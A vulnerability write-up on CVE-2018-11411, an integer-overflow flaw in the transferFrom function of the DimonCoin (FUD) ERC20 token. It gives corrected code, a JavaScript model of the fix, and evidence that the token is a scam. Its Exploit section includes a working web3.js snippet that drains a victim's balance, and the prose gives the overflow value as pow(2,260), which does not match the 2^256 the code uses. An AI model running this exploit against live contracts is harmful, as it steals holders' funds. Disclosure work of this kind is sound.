DimonCoin (FUD), ERC20 token, allows attackers to steal all victim’s balances (CVE-2018-11411)

Abstract

I found a vulnerability in the smart contract for DimonCoin (FUD), an Ethereum ERC20 token (CVE-2018-11411)[1]. This vulnerability is exactly the same as the UselessEthereumToken (UET) vulnerability[2, 3]: the DimonCoin token has the same vulnerable transferFrom function as the UET token. Attackers can therefore steal all of a victim’s balance into their own accounts by exploiting this function. After more investigation, I found that DimonCoin (FUD) is a scam. There are multiple smart contracts for the FUD token, and one of them has been dumped. I found the vulnerability in a different contract, which has not been dumped yet. In this article, I will explain the details of the vulnerability and the FUD token.

Details

As mentioned above, this vulnerability is the same as the vulnerability in UselessEthereumToken (CVE-2018-10468)[3]. Reading the article “UselessEthereumToken(UET), ERC20 token, allows attackers to steal all victim’s balances (CVE-2018-10468)”[2] will help in understanding it.

Figure 1. Code of transferFrom function in FUD smart contract

Figure 1 shows the vulnerable transferFrom function. The check against the ERC20 short address attack has been moved to the modifier onlyPayloadSize. That is the only change; the rest is exactly the same as the transferFrom function in the UET token.

As you can see, the code in the red box is wrong. With this code, a user can transfer more than address _from holds when balances[_to] + _value overflows. The correct code should be as follows:

bool sufficientFunds = fromBalance >= _value;
bool sufficientAllowance = allowance >= _value;
// Despite its name, this is true only when the addition does NOT wrap around.
bool overflowed = balances[_to] + _value > balances[_to];
if (sufficientFunds && sufficientAllowance && overflowed) {
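
The corrected condition can be exercised off-chain before it is relied on. The JavaScript model below is an added example, not code from the FUD contract or from the original article; the ledger object, the account names and the balances are constructed for illustration, and uint256 wrap-around is modelled with BigInt arithmetic modulo 2^256.

```javascript
// Added example: the corrected transferFrom condition, modelled off-chain.
const UINT256_MOD = 1n << 256n; // Solidity uint256 arithmetic wraps modulo 2^256
const addU256 = (a, b) => (a + b) % UINT256_MOD;

// Hypothetical in-memory ledger standing in for the contract's storage.
function makeLedger(balances, allowed) {
  return { balances: new Map(balances), allowed: new Map(allowed) };
}

// Same three conditions as the corrected Solidity fragment: enough funds,
// enough allowance, and balances[_to] + _value must not wrap around.
function transferFromFixed(ledger, spender, from, to, value) {
  // Model assumption: zero and out-of-range values are rejected up front.
  if (value <= 0n || value >= UINT256_MOD) return false;
  const key = `${from}:${spender}`;
  const fromBalance = ledger.balances.get(from) ?? 0n;
  const toBalance = ledger.balances.get(to) ?? 0n;
  const allowance = ledger.allowed.get(key) ?? 0n;

  const sufficientFunds = fromBalance >= value;
  const sufficientAllowance = allowance >= value;
  const noOverflow = addU256(toBalance, value) > toBalance;
  if (!(sufficientFunds && sufficientAllowance && noOverflow)) return false;

  ledger.balances.set(to, toBalance + value);
  ledger.balances.set(from, fromBalance - value);
  ledger.allowed.set(key, allowance - value);
  return true;
}

// Constructed sample state. "whale" holds an unrealistically large balance so
// that the third case is rejected by the overflow guard alone.
function demo() {
  const big = UINT256_MOD - 1n;
  const ledger = makeLedger(
    [["alice", 100n], ["carol", 0xaaaan], ["whale", big]],
    [["alice:bob", 50n], ["whale:bob", big]]
  );
  return {
    legit: transferFromFixed(ledger, "bob", "alice", "carol", 30n),
    overAllowance: transferFromFixed(ledger, "bob", "alice", "carol", 40n),
    wrapping: transferFromFixed(ledger, "bob", "whale", "carol", big),
    alice: ledger.balances.get("alice"),
    carol: ledger.balances.get("carol"),
  };
}

console.log(demo());
```

Only the first call succeeds: the second is stopped by the allowance check and the third by the overflow guard, leaving every balance unchanged after the legitimate transfer.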

Exploit

All attackers have to do is find a target account and a value that causes the overflow. If the balance of a target account is 0xaaaa, the value should be more than pow(2,260)-0xaaaa. If the value is exactly pow(2,260)-0xaaaa, then all of the target’s balance is transferred to the attacker’s account. A part of my exploit code is as follows:

max = web3.utils.toBN('0x10000000000000000000000000000000000000000000000000000000000000000');
v_bal=web3.utils.toBN(await FUD.methods.balanceOf(victim).call());
FUD.methods.transferFrom(attacker, victim, max.sub(v_bal))
.send({from:attacker, gas:1000000, gasPrice:1});

Scam

DimonCoin (FUD) has already been regarded as a scam[4]. There are multiple smart contracts for the FUD token. I think the developers created the several smart contracts to hide their cheating. Among the contracts, one is the vulnerable contract[5] that I found, and another is a contract that is suspected to have been dumped by the developers[6]. In the dumped contract, some accounts hold more tokens than the total supply[7].

Figure 2. All top 10 holders have tokens more than 1000000% of total supply

The developers advertised the FUD token on bitcointalk using the two contract addresses[8]. The advertisement was translated into several languages, and 6 of the translated copies advertise the vulnerable contract.

- Skandinavisk/Danish: https://bitcointalk.org/index.php?topic=2249616 
- German: https://bitcointalk.org/index.php?topic=2254901 
- Italian: https://bitcointalk.org/index.php?topic=2248634.0 
- Russian: https://bitcointalk.org/index.php?topic=2255885 
- Chinese: https://bitcointalk.org/index.php?topic=2250544 
- Korean: https://bitcointalk.org/index.php?topic=2292406

The developers have already removed the evidence. The official site, Telegram, Twitter and GitHub pages are down[9–12]. Only the Facebook page remains[13].

Conclusion

I am sure that DimonCoin (FUD) is a scam. The developers created multiple contracts without a rational reason; one is dumped and the other has a vulnerability. Moreover, the communication channels to the developers have been removed. It is already widely known that it is a scam, but some people still make transactions to the contracts. So it should be known to more people. Please be careful when you trade unverified coins.

References